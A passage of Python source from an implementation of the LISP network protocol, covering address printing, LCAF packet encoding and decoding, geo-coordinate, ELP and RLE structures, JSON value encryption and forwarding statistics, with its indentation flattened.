return("{}".format(self.address.print_geo()))
elif (self.is_mac()):
addr_str = lisp_hex_string(self.address).zfill(12)
addr_str = "{}-{}-{}".format(addr_str[0:4], addr_str[4:8],
addr_str[8:12])
return("{}".format(addr_str))
elif (self.is_e164()):
addr_str = lisp_hex_string(self.address).zfill(15)
return("+{}".format(addr_str))
elif (self.is_dist_name()):
return("'{}'".format(self.address))
elif (self.is_null()):
return("no-address")
#endif
return("unknown-afi:{}".format(self.afi))
#enddef
def print_prefix(self):
if (self.is_ultimate_root()): return("[*]")
if (self.is_iid_range()):
if (self.mask_len == 32): return("[{}]".format(self.instance_id))
upper = self.instance_id + (2**(32 - self.mask_len) - 1)
return("[{}-{}]".format(self.instance_id, upper))
#endif
addr = self.print_address()
if (self.is_dist_name()): return(addr)
if (self.is_geo_prefix()): return(addr)
index = addr.find("no-address")
if (index == -1):
addr = "{}/{}".format(addr, str(self.mask_len))
else:
addr = addr[0:index]
#endif
return(addr)
#enddef
def print_prefix_no_iid(self):
addr = self.print_address_no_iid()
if (self.is_dist_name()): return(addr)
if (self.is_geo_prefix()): return(addr)
return("{}/{}".format(addr, str(self.mask_len)))
#enddef
def print_prefix_url(self):
if (self.is_ultimate_root()): return("0--0")
addr = self.print_address()
index = addr.find("]")
if (index != -1): addr = addr[index+1::]
if (self.is_geo_prefix()):
addr = addr.replace("/", "-")
return("{}-{}".format(self.instance_id, addr))
#endif
return("{}-{}-{}".format(self.instance_id, addr, self.mask_len))
#enddef
def print_sg(self, g):
s = self.print_prefix()
si = s.find("]") + 1
g = g.print_prefix()
gi = g.find("]") + 1
sg_str = "[{}]({}, {})".format(self.instance_id, s[si::], g[gi::])
return(sg_str)
#enddef
def hash_address(self, addr):
addr1 = self.address
addr2 = addr.address
if (self.is_geo_prefix()): addr1 = self.address.print_geo()
if (addr.is_geo_prefix()): addr2 = addr.address.print_geo()
if (type(addr1) == str):
addr1 = int(binascii.hexlify(addr1[0:1]))
#endif
if (type(addr2) == str):
addr2 = int(binascii.hexlify(addr2[0:1]))
#endif
return(addr1 ^ addr2)
#enddef
#
# Is self more specific or equal to the prefix supplied in variable
# 'prefix'. Return True if so.
#
def is_more_specific(self, prefix):
if (prefix.afi == LISP_AFI_ULTIMATE_ROOT): return(True)
mask_len = prefix.mask_len
if (prefix.afi == LISP_AFI_IID_RANGE):
size = 2**(32 - mask_len)
lower = prefix.instance_id
upper = lower + size
return(self.instance_id in range(lower, upper))
#endif
if (self.instance_id != prefix.instance_id): return(False)
if (self.afi != prefix.afi):
if (prefix.afi != LISP_AFI_NONE): return(False)
#endif
#
# Handle string addresses like distinguished names and geo-prefixes.
#
if (self.is_binary() == False):
if (prefix.afi == LISP_AFI_NONE): return(True)
if (type(self.address) != type(prefix.address)): return(False)
addr = self.address
paddr = prefix.address
if (self.is_geo_prefix()):
addr = self.address.print_geo()
paddr = prefix.address.print_geo()
#endif
if (len(addr) < len(paddr)): return(False)
return(addr.find(paddr) == 0)
#endif
#
# Handle numeric addresses.
#
if (self.mask_len < mask_len): return(False)
shift = (prefix.addr_length() * 8) - mask_len
mask = (2**mask_len - 1) << shift
return((self.address & mask) == prefix.address)
#enddef
def mask_address(self, mask_len):
shift = (self.addr_length() * 8) - mask_len
mask = (2**mask_len - 1) << shift
self.address &= mask
#enddef
def is_exact_match(self, prefix):
if (self.instance_id != prefix.instance_id): return(False)
p1 = self.print_prefix()
p2 = prefix.print_prefix() if prefix else ""
return(p1 == p2)
#enddef
def is_local(self):
if (self.is_ipv4()):
local = lisp_myrlocs[0]
if (local == None): return(False)
local = local.print_address_no_iid()
return(self.print_address_no_iid() == local)
#endif
if (self.is_ipv6()):
local = lisp_myrlocs[1]
if (local == None): return(False)
local = local.print_address_no_iid()
return(self.print_address_no_iid() == local)
#endif
return(False)
#enddef
def store_iid_range(self, iid, mask_len):
if (self.afi == LISP_AFI_NONE):
if (iid == 0 and mask_len == 0): self.afi = LISP_AFI_ULTIMATE_ROOT
else: self.afi = LISP_AFI_IID_RANGE
#endif
self.instance_id = iid
self.mask_len = mask_len
#enddef
def lcaf_length(self, lcaf_type):
length = self.addr_length() + 2
if (lcaf_type == LISP_LCAF_AFI_LIST_TYPE): length += 4
if (lcaf_type == LISP_LCAF_INSTANCE_ID_TYPE): length += 4
if (lcaf_type == LISP_LCAF_ASN_TYPE): length += 4
if (lcaf_type == LISP_LCAF_APP_DATA_TYPE): length += 8
if (lcaf_type == LISP_LCAF_GEO_COORD_TYPE): length += 12
if (lcaf_type == LISP_LCAF_OPAQUE_TYPE): length += 0
if (lcaf_type == LISP_LCAF_NAT_TYPE): length += 4
if (lcaf_type == LISP_LCAF_NONCE_LOC_TYPE): length += 4
if (lcaf_type == LISP_LCAF_MCAST_INFO_TYPE): length = length * 2 + 8
if (lcaf_type == LISP_LCAF_ELP_TYPE): length += 0
if (lcaf_type == LISP_LCAF_SECURITY_TYPE): length += 6
if (lcaf_type == LISP_LCAF_SOURCE_DEST_TYPE): length += 4
if (lcaf_type == LISP_LCAF_RLE_TYPE): length += 4
return(length)
#enddef
#
# Instance ID LISP Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 2 | IID mask-len | 4 + n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Instance ID |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
def lcaf_encode_iid(self):
lcaf_type = LISP_LCAF_INSTANCE_ID_TYPE
addr_length = socket.htons(self.lcaf_length(lcaf_type))
iid = self.instance_id
afi = self.afi
ml = 0
if (afi < 0):
if (self.afi == LISP_AFI_GEO_COORD):
afi = LISP_AFI_LCAF
ml = 0
else:
afi = 0
ml = self.mask_len
#endif
#endif
lcaf = struct.pack("BBBBH", 0, 0, lcaf_type, ml, addr_length)
lcaf += struct.pack("IH", socket.htonl(iid), socket.htons(afi))
if (afi == 0): return(lcaf)
if (self.afi == LISP_AFI_GEO_COORD):
lcaf = lcaf[0:-2]
lcaf += self.address.encode_geo()
return(lcaf)
#endif
lcaf += self.pack_address()
return(lcaf)
#enddef
def lcaf_decode_iid(self, packet):
packet_format = "BBBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
x, y, lcaf_type, iid_ml, length = struct.unpack(packet_format,
packet[:format_size])
packet = packet[format_size::]
if (lcaf_type != LISP_LCAF_INSTANCE_ID_TYPE): return(None)
packet_format = "IH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
iid, afi = struct.unpack(packet_format, packet[:format_size])
packet = packet[format_size::]
length = socket.ntohs(length)
self.instance_id = socket.ntohl(iid)
afi = socket.ntohs(afi)
self.afi = afi
if (iid_ml != 0 and afi == 0): self.mask_len = iid_ml
if (afi == 0):
self.afi = LISP_AFI_IID_RANGE if iid_ml else LISP_AFI_ULTIMATE_ROOT
#endif
#
# No address encoded.
#
if (afi == 0): return(packet)
#
# Look for distinguished-name.
#
if (self.is_dist_name()):
packet, self.address = lisp_decode_dist_name(packet)
self.mask_len = len(self.address) * 8
return(packet)
#endif
#
# Only process geo-prefixes inside of an LCAF encoded Instance-ID type.
#
if (afi == LISP_AFI_LCAF):
packet_format = "BBBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
rsvd1, flags, lcaf_type, rsvd2, lcaf_len = \
struct.unpack(packet_format, packet[:format_size])
if (lcaf_type != LISP_LCAF_GEO_COORD_TYPE): return(None)
lcaf_len = socket.ntohs(lcaf_len)
packet = packet[format_size::]
if (lcaf_len > len(packet)): return(None)
geo = lisp_geo("")
self.afi = LISP_AFI_GEO_COORD
self.address = geo
packet = geo.decode_geo(packet, lcaf_len, rsvd2)
self.mask_len = self.host_mask_len()
return(packet)
#endif
addr_length = self.addr_length()
if (len(packet) < addr_length): return(None)
packet = self.unpack_address(packet)
return(packet)
#enddef
#
# Multicast Info Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 9 | Rsvd2 |R|L|J| 8 + n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Instance-ID |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Reserved | Source MaskLen| Group MaskLen |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Source/Subnet Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Group Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
def lcaf_encode_sg(self, group):
lcaf_type = LISP_LCAF_MCAST_INFO_TYPE
iid = socket.htonl(self.instance_id)
addr_length = socket.htons(self.lcaf_length(lcaf_type))
lcaf = struct.pack("BBBBHIHBB", 0, 0, lcaf_type, 0, addr_length, iid,
0, self.mask_len, group.mask_len)
lcaf += struct.pack("H", socket.htons(self.afi))
lcaf += self.pack_address()
lcaf += struct.pack("H", socket.htons(group.afi))
lcaf += group.pack_address()
return(lcaf)
#enddef
def lcaf_decode_sg(self, packet):
packet_format = "BBBBHIHBB"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
x, y, lcaf_type, rsvd, length, iid, z, sml, gml = \
struct.unpack(packet_format, packet[:format_size])
packet = packet[format_size::]
if (lcaf_type != LISP_LCAF_MCAST_INFO_TYPE): return([None, None])
self.instance_id = socket.ntohl(iid)
length = socket.ntohs(length) - 8
#
# Get AFI and source address. Validate if enough length and there
# are bytes in the packet.
#
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
if (length < format_size): return([None, None])
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
length -= format_size
self.afi = socket.ntohs(afi)
self.mask_len = sml
addr_length = self.addr_length()
if (length < addr_length): return([None, None])
packet = self.unpack_address(packet)
if (packet == None): return([None, None])
length -= addr_length
#
# Get AFI and source address. Validate if enough length and there
# are bytes in the packet.
#
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
if (length < format_size): return([None, None])
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
length -= format_size
group = lisp_address(LISP_AFI_NONE, "", 0, 0)
group.afi = socket.ntohs(afi)
group.mask_len = gml
group.instance_id = self.instance_id
addr_length = self.addr_length()
if (length < addr_length): return([None, None])
packet = group.unpack_address(packet)
if (packet == None): return([None, None])
return([packet, group])
#enddef
def lcaf_decode_eid(self, packet):
packet_format = "BBB"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
#
# Do not advance packet pointer. The specific LCAF decoders will do
# it themselves.
#
rsvd, flags, lcaf_type = struct.unpack(packet_format,
packet[:format_size])
if (lcaf_type == LISP_LCAF_INSTANCE_ID_TYPE):
return([self.lcaf_decode_iid(packet), None])
elif (lcaf_type == LISP_LCAF_MCAST_INFO_TYPE):
packet, group = self.lcaf_decode_sg(packet)
return([packet, group])
elif (lcaf_type == LISP_LCAF_GEO_COORD_TYPE):
packet_format = "BBBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
rsvd1, flags, lcaf_type, rsvd2, lcaf_len = \
struct.unpack(packet_format, packet[:format_size])
if (lcaf_type != LISP_LCAF_GEO_COORD_TYPE): return(None)
lcaf_len = socket.ntohs(lcaf_len)
packet = packet[format_size::]
if (lcaf_len > len(packet)): return(None)
geo = lisp_geo("")
self.instance_id = 0
self.afi = LISP_AFI_GEO_COORD
self.address = geo
packet = geo.decode_geo(packet, lcaf_len, rsvd2)
self.mask_len = self.host_mask_len()
#endif
return([packet, None])
#enddef
#endclass
#
# Data structure for storing learned or configured ELPs.
#
class lisp_elp_node(object):
def __init__(self):
self.address = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.probe = False
self.strict = False
self.eid = False
self.we_are_last = False
#enddef
def copy_elp_node(self):
elp_node = lisp_elp_node()
elp_node.copy_address(self.address)
elp_node.probe = self.probe
elp_node.strict = self.strict
elp_node.eid = self.eid
elp_node.we_are_last = self.we_are_last
return(elp_node)
#enddef
#endclass
class lisp_elp(object):
def __init__(self, name):
self.elp_name = name
self.elp_nodes = []
self.use_elp_node = None
self.we_are_last = False
#enddef
def copy_elp(self):
elp = lisp_elp(self.elp_name)
elp.use_elp_node = self.use_elp_node
elp.we_are_last = self.we_are_last
for elp_node in self.elp_nodes:
elp.elp_nodes.append(elp_node.copy_elp_node())
#endfor
return(elp)
#enddef
def print_elp(self, want_marker):
elp_str = ""
for elp_node in self.elp_nodes:
use_or_last = ""
if (want_marker):
if (elp_node == self.use_elp_node):
use_or_last = "*"
elif (elp_node.we_are_last):
use_or_last = "x"
#endif
#endif
elp_str += "{}{}({}{}{}), ".format(use_or_last,
elp_node.address.print_address_no_iid(),
"r" if elp_node.eid else "R", "P" if elp_node.probe else "p",
"S" if elp_node.strict else "s")
#endfor
return(elp_str[0:-2] if elp_str != "" else "")
#enddef
def select_elp_node(self):
v4, v6, device = lisp_myrlocs
index = None
for elp_node in self.elp_nodes:
if (v4 and elp_node.address.is_exact_match(v4)):
index = self.elp_nodes.index(elp_node)
break
#endif
if (v6 and elp_node.address.is_exact_match(v6)):
index = self.elp_nodes.index(elp_node)
break
#endif
#endfor
#
# If we did not find a match, this is possibly an ITR. We need to give
# if the first ELP node.
#
if (index == None):
self.use_elp_node = self.elp_nodes[0]
elp_node.we_are_last = False
return
#endif
#
# If we matched the last item in the ELP nodes, we are the end of the
# path. Flag it for display purposes and return None.
#
if (self.elp_nodes[-1] == self.elp_nodes[index]):
self.use_elp_node = None
elp_node.we_are_last = True
return
#endif
#
# Return the next node after the one that matches this system.
#
self.use_elp_node = self.elp_nodes[index+1]
return
#enddef
#endclass
class lisp_geo(object):
def __init__(self, name):
self.geo_name = name
self.latitude = 0xffffffff # Negative when North, otherwise South
self.lat_mins = 0
self.lat_secs = 0
self.longitude = 0xffffffff # Negative when East, otherwise West
self.long_mins = 0
self.long_secs = 0
self.altitude = -1
self.radius = 0
#enddef
def copy_geo(self):
geo = lisp_geo(self.geo_name)
geo.latitude = self.latitude
geo.lat_mins = self.lat_mins
geo.lat_secs = self.lat_secs
geo.longitude = self.longitude
geo.long_mins = self.long_mins
geo.long_secs = self.long_secs
geo.altitude = self.altitude
geo.radius = self.radius
return(geo)
#enddef
def no_geo_altitude(self):
return(self.altitude == -1)
#enddef
def parse_geo_string(self, geo_str):
index = geo_str.find("]")
if (index != -1): geo_str = geo_str[index+1::]
#
# Check if radius is specified. That is a geo-prefix and not just a
# geo-point.
#
if (geo_str.find("/") != -1):
geo_str, radius = geo_str.split("/")
self.radius = int(radius)
#endif
geo_str = geo_str.split("-")
if (len(geo_str) < 8): return(False)
latitude = geo_str[0:4]
longitude = geo_str[4:8]
#
# Get optional altitude.
#
if (len(geo_str) > 8): self.altitude = int(geo_str[8])
#
# Get latitude values.
#
self.latitude = int(latitude[0])
self.lat_mins = int(latitude[1])
self.lat_secs = int(latitude[2])
if (latitude[3] == "N"): self.latitude = -self.latitude
#
# Get longitude values.
#
self.longitude = int(longitude[0])
self.long_mins = int(longitude[1])
self.long_secs = int(longitude[2])
if (longitude[3] == "E"): self.longitude = -self.longitude
return(True)
#enddef
def print_geo(self):
n_or_s = "N" if self.latitude < 0 else "S"
e_or_w = "E" if self.longitude < 0 else "W"
geo_str = "{}-{}-{}-{}-{}-{}-{}-{}".format(abs(self.latitude),
self.lat_mins, self.lat_secs, n_or_s, abs(self.longitude),
self.long_mins, self.long_secs, e_or_w)
if (self.no_geo_altitude() == False):
geo_str += "-" + str(self.altitude)
#endif
#
# Print "/<radius>" if not 0.
#
if (self.radius != 0): geo_str += "/{}".format(self.radius)
return(geo_str)
#enddef
def geo_url(self):
zoom = os.getenv("LISP_GEO_ZOOM_LEVEL")
zoom = "10" if (zoom == "" or zoom.isdigit() == False) else zoom
lat, lon = self.dms_to_decimal()
url = ("http://maps.googleapis.com/maps/api/staticmap?center={},{}" + \
"&markers=color:blue%7Clabel:lisp%7C{},{}" + \
"&zoom={}&size=1024x1024&sensor=false").format(lat, lon, lat, lon,
zoom)
return(url)
#enddef
def print_geo_url(self):
geo = self.print_geo()
if (self.radius == 0):
url = self.geo_url()
string = "<a href='{}'>{}</a>".format(url, geo)
else:
url = geo.replace("/", "-")
string = "<a href='/lisp/geo-map/{}'>{}</a>".format(url, geo)
#endif
return(string)
#enddef
def dms_to_decimal(self):
degs, mins, secs = self.latitude, self.lat_mins, self.lat_secs
dd = float(abs(degs))
dd += float(mins * 60 + secs) / 3600
if (degs > 0): dd = -dd
dd_lat = dd
degs, mins, secs = self.longitude, self.long_mins, self.long_secs
dd = float(abs(degs))
dd += float(mins * 60 + secs) / 3600
if (degs > 0): dd = -dd
dd_long = dd
return((dd_lat, dd_long))
#enddef
def get_distance(self, geo_point):
dd_prefix = self.dms_to_decimal()
dd_point = geo_point.dms_to_decimal()
distance = geopy.distance.distance(dd_prefix, dd_point)
return(distance.km)
#enddef
def point_in_circle(self, geo_point):
km = self.get_distance(geo_point)
return(km <= self.radius)
#enddef
def encode_geo(self):
lcaf_afi = socket.htons(LISP_AFI_LCAF)
geo_len = socket.htons(20 + 2)
flags = 0
lat = abs(self.latitude)
lat_ms = ((self.lat_mins * 60) + self.lat_secs) * 1000
if (self.latitude < 0): flags |= 0x40
lon = abs(self.longitude)
lon_ms = ((self.long_mins * 60) + self.long_secs) * 1000
if (self.longitude < 0): flags |= 0x20
alt = 0
if (self.no_geo_altitude() == False):
alt = socket.htonl(self.altitude)
flags |= 0x10
#endif
radius = socket.htons(self.radius)
if (radius != 0): flags |= 0x06
pkt = struct.pack("HBBBBH", lcaf_afi, 0, 0, LISP_LCAF_GEO_COORD_TYPE,
0, geo_len)
pkt += struct.pack("BBHBBHBBHIHHH", flags, 0, 0, lat, lat_ms >> 16,
socket.htons(lat_ms & 0x0ffff), lon, lon_ms >> 16,
socket.htons(lon_ms & 0xffff), alt, radius, 0, 0)
return(pkt)
#enddef
def decode_geo(self, packet, lcaf_len, radius_hi):
packet_format = "BBHBBHBBHIHHH"
format_size = struct.calcsize(packet_format)
if (lcaf_len < format_size): return(None)
flags, r1, uncertainty, lat, lat_hi, lat_ms, lon, lon_hi, lon_ms, \
alt, radius, r2, afi = struct.unpack(packet_format,
packet[:format_size])
#
# No nested LCAFs in Geo-Coord type.
#
afi = socket.ntohs(afi)
if (afi == LISP_AFI_LCAF): return(None)
if (flags & 0x40): lat = -lat
self.latitude = lat
lat_secs = old_div(((lat_hi << 16) | socket.ntohs(lat_ms)), 1000)
self.lat_mins = old_div(lat_secs, 60)
self.lat_secs = lat_secs % 60
if (flags & 0x20): lon = -lon
self.longitude = lon
lon_secs = old_div(((lon_hi << 16) | socket.ntohs(lon_ms)), 1000)
self.long_mins = old_div(lon_secs, 60)
self.long_secs = lon_secs % 60
self.altitude = socket.ntohl(alt) if (flags & 0x10) else -1
radius = socket.ntohs(radius)
self.radius = radius if (flags & 0x02) else radius * 1000
self.geo_name = None
packet = packet[format_size::]
if (afi != 0):
self.rloc.afi = afi
packet = self.rloc.unpack_address(packet)
self.rloc.mask_len = self.rloc.host_mask_len()
#endif
return(packet)
#enddef
#endclass
#
# Structure for Replication List Entries.
#
class lisp_rle_node(object):
def __init__(self):
self.address = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.level = 0
self.translated_port = 0
self.rloc_name = None
#enddef
def copy_rle_node(self):
rle_node = lisp_rle_node()
rle_node.address.copy_address(self.address)
rle_node.level = self.level
rle_node.translated_port = self.translated_port
rle_node.rloc_name = self.rloc_name
return(rle_node)
#enddef
def store_translated_rloc(self, rloc, port):
self.address.copy_address(rloc)
self.translated_port = port
#enddef
def get_encap_keys(self):
port = "4341" if self.translated_port == 0 else \
str(self.translated_port)
addr_str = self.address.print_address_no_iid() + ":" + port
try:
keys = lisp_crypto_keys_by_rloc_encap[addr_str]
if (keys[1]): return(keys[1].encrypt_key, keys[1].icv_key)
return(None, None)
except:
return(None, None)
#endtry
#enddef
#endclass
class lisp_rle(object):
def __init__(self, name):
self.rle_name = name
self.rle_nodes = []
self.rle_forwarding_list = []
#enddef
def copy_rle(self):
rle = lisp_rle(self.rle_name)
for rle_node in self.rle_nodes:
rle.rle_nodes.append(rle_node.copy_rle_node())
#endfor
rle.build_forwarding_list()
return(rle)
#enddef
def print_rle(self, html, do_formatting):
rle_str = ""
for rle_node in self.rle_nodes:
port = rle_node.translated_port
rle_name_str = ""
if (rle_node.rloc_name != None):
rle_name_str = rle_node.rloc_name
if (do_formatting): rle_name_str = blue(rle_name_str, html)
rle_name_str = "({})".format(rle_name_str)
#endif
addr_str = rle_node.address.print_address_no_iid()
if (rle_node.address.is_local()): addr_str = red(addr_str, html)
rle_str += "{}{}{}, ".format(addr_str, "" if port == 0 else \
":" + str(port), rle_name_str)
#endfor
return(rle_str[0:-2] if rle_str != "" else "")
#enddef
def build_forwarding_list(self):
level = -1
for rle_node in self.rle_nodes:
if (level == -1):
if (rle_node.address.is_local()): level = rle_node.level
else:
if (rle_node.level > level): break
#endif
#endfor
level = 0 if level == -1 else rle_node.level
self.rle_forwarding_list = []
for rle_node in self.rle_nodes:
if (rle_node.level == level or (level == 0 and
rle_node.level == 128)):
if (lisp_i_am_rtr == False and rle_node.address.is_local()):
addr_str = rle_node.address.print_address_no_iid()
lprint("Exclude local RLE RLOC {}".format(addr_str))
continue
#endif
self.rle_forwarding_list.append(rle_node)
#endif
#endfor
#enddef
#endclass
class lisp_json(object):
def __init__(self, name, string, encrypted=False, ms_encrypt=False):
#
# Deal with py3.
#
if (type(string) == bytes): string = string.decode()
self.json_name = name
self.json_encrypted = False
try:
json.loads(string)
except:
lprint("Invalid JSON string: '{}'".format(string))
string = '{ "?" : "?" }'
#endtry
self.json_string = string
#
# Decide to encrypt or decrypt. The map-server encrypts and stores
# ciphertext in mapping system. The lig client decrypts to show user
# data if it has the key in env variable LISP_JSON_KEY. Format of
# env variable is "<key>" or "[<key-id>]<key>".
#
# If the LISP site-eid is not configured to encrypt the JSON than
# store in plaintext.
#
if (len(lisp_ms_json_keys) != 0):
if (ms_encrypt == False): return
self.json_key_id = list(lisp_ms_json_keys.keys())[0]
self.json_key = lisp_ms_json_keys[self.json_key_id]
self.encrypt_json()
#endif
if (lisp_log_id == "lig" and encrypted):
key = os.getenv("LISP_JSON_KEY")
if (key != None):
index = -1
if (key[0] == "[" and "]" in key):
index = key.find("]")
self.json_key_id = int(key[1:index])
#endif
self.json_key = key[index+1::]
#endif
self.decrypt_json()
#endif
#endif
#enddef
def add(self):
self.delete()
lisp_json_list[self.json_name] = self
#enddef
def delete(self):
if (self.json_name in lisp_json_list):
del(lisp_json_list[self.json_name])
lisp_json_list[self.json_name] = None
#endif
#enddef
def print_json(self, html):
good_string = self.json_string
bad = "***"
if (html): bad = red(bad, html)
bad_string = bad + self.json_string + bad
if (self.valid_json()): return(good_string)
return(bad_string)
#enddef
def valid_json(self):
try:
json.loads(self.json_string)
except:
return(False)
#endtry
return(True)
#enddef
def encrypt_json(self):
ekey = self.json_key.zfill(32)
iv = "0" * 8
jd = json.loads(self.json_string)
for key in jd:
value = jd[key]
if (type(value) != str): value = str(value)
value = chacha.ChaCha(ekey, iv).encrypt(value)
jd[key] = binascii.hexlify(value)
#endfor
self.json_string = json.dumps(jd)
self.json_encrypted = True
#enddef
def decrypt_json(self):
ekey = self.json_key.zfill(32)
iv = "0" * 8
jd = json.loads(self.json_string)
for key in jd:
value = binascii.unhexlify(jd[key])
jd[key] = chacha.ChaCha(ekey, iv).encrypt(value)
#endfor
try:
self.json_string = json.dumps(jd)
self.json_encrypted = False
except:
pass
#endtry
#enddef
#endclass
#
# LISP forwarding stats info.
#
class lisp_stats(object):
def __init__(self):
self.packet_count = 0
self.byte_count = 0
self.last_rate_check = 0
self.last_packet_count = 0
self.last_byte_count = 0
self.last_increment = None
#enddef
def increment(self, octets):
self.packet_count += 1
self.byte_count += octets
self.last_increment = lisp_get_timestamp()
#enddef
def recent_packet_sec(self):
if (self.last_increment == None): return(False)
elapsed = time.time() - self.last_increment
return(elapsed <= 1)
#enddef
def recent_packet_min(self):
if (self.last_increment == None): return(False)
elapsed = time.time() - self.last_increment
return(elapsed <= 60)
#enddef
def stat_colors(self, c1, c2, html):
if (self.recent_packet_sec()):
return(green_last_sec(c1), green_last_sec(c2))
#endif
if (self.recent_packet_min()):
return(green_last_min(c1), green_last_min(c2))
#endif
return(c1, c2)
#enddef
def normalize(self, count):
count = str(count)
digits = len(count)
if (digits > 12):
count = count[0:-10] + "." + count[-10:-7] + "T"
return(count)
#endif
if (digits > 9):
count = count[0:-9] + "." + count[-9:-7] + "B"
return(count)
#endif
if (digits > 6):
count = count[0:-6] + "." + count[-6] + "M"
return(count)
#endif
return(count)
#enddef
def get_stats(self, summary, html):
last_rate = self.last_rate_check
last_packets = self.last_packet_count
last_bytes = self.last_byte_count
self.last_rate_check = lisp_get_timestamp()
self.last_packet_count = self.packet_count
self.last_byte_count = self.byte_count
rate_diff = self.last_rate_check - last_rate
if (rate_diff == 0):
packet_rate = 0
bit_rate = 0
else:
packet_rate = int(old_div((self.packet_count - last_packets),
rate_diff))
bit_rate = old_div((self.byte_count - last_bytes), rate_diff)
bit_rate = old_div((bit_rate * 8), 1000000)
bit_rate = round(bit_rate, 2)
#endif
#
# Normalize and put in string form.
#
packets = self.normalize(self.packet_count)
bc = self.normalize(self.byte_count)
#
# The summary version gives you the string above in a pull-down html
# menu and the title string is the string below.
#
if (summary):
h = "<br>" if html else ""
packets, bc = self.stat_colors(packets, bc, html)
title = "packet-count: {}{}byte-count: {}".format(packets, h, bc)
stats = "packet-rate: {} pps\nbit-rate: {} Mbps".format( \
packet_rate, bit_rate)
if (html != ""): stats = lisp_span(title, stats)
else:
prate = str(packet_rate)
brate = str(bit_rate)
if (html):
packets = lisp_print_cour(packets)
prate = lisp_print_cour(prate)
bc = lisp_print_cour(bc)
brate = lisp_print_cour(brate)
#endif
h = "<br>" if html else ", "
stats = ("packet-count: {}{}packet-rate: {} pps{}byte-count: " + \
"{}{}bit-rate: {} mbps").format(packets, h, prate, h, bc, h,
brate)
#endif
return(stats)
#enddef
#endclass
#
# ETR/RTR decapsulation total packet and errors stats. Anytime a lisp_packet().
# packet_error value is added, this dictionary array needs to add the key
# string.
#
lisp_decap_stats = {
"good-packets" : lisp_stats(), "ICV-error" : lisp_stats(),
"checksum-error" : lisp_stats(), "lisp-header-error" : lisp_stats(),
"no-decrypt-key" : lisp_stats(), "bad-inner-version" : lisp_stats(),
"outer-header-error" : lisp_stats()
}
#
# This a locator record definition as defined in RFCs.
#
class lisp_rloc(object):
def __init__(self, recurse=True):
self.rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.rloc_name = None
self.interface = None
self.translated_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.translated_port = 0
self.priority = 255
self.weight = 0
self.mpriority = 255
self.mweight = 0
self.uptime = lisp_get_timestamp()
self.state = LISP_RLOC_UP_STATE
self.last_state_change = None
self.rle_name = None
self.elp_name = None
self.geo_name = None
self.json_name = None
self.geo = None
self.elp = None
self.rle = None
self.json = None
self.stats = lisp_stats()
self.last_rloc_probe = None
self.last_rloc_probe_reply = None
self.rloc_probe_rtt = -1
self.recent_rloc_probe_rtts = [-1, -1, -1]
self.rloc_probe_hops = "?/?"
self.recent_rloc_probe_hops = ["?/?", "?/?", "?/?"]
self.rloc_probe_latency = "?/?"
self.recent_rloc_probe_latencies = ["?/?", "?/?", "?/?"]
self.last_rloc_probe_nonce = 0
self.echo_nonce_capable = False
self.map_notify_requested = False
self.rloc_next_hop = None
self.next_rloc = None
self.multicast_rloc_probe_list = {}
if (recurse == False): return
#
# This is for a box with multiple egress interfaces. We create an
# rloc chain, one for each <device, nh> tuple. So we can RLOC-probe
# individually.
#
next_hops = lisp_get_default_route_next_hops()
if (next_hops == [] or len(next_hops) == 1): return
self.rloc_next_hop = next_hops[0]
last = self
for nh in next_hops[1::]:
hop = lisp_rloc(False)
hop = copy.deepcopy(self)
hop.rloc_next_hop = nh
last.next_rloc = hop
last = hop
#endfor
#enddef
def up_state(self):
return(self.state == LISP_RLOC_UP_STATE)
#enddef
def unreach_state(self):
return(self.state == LISP_RLOC_UNREACH_STATE)
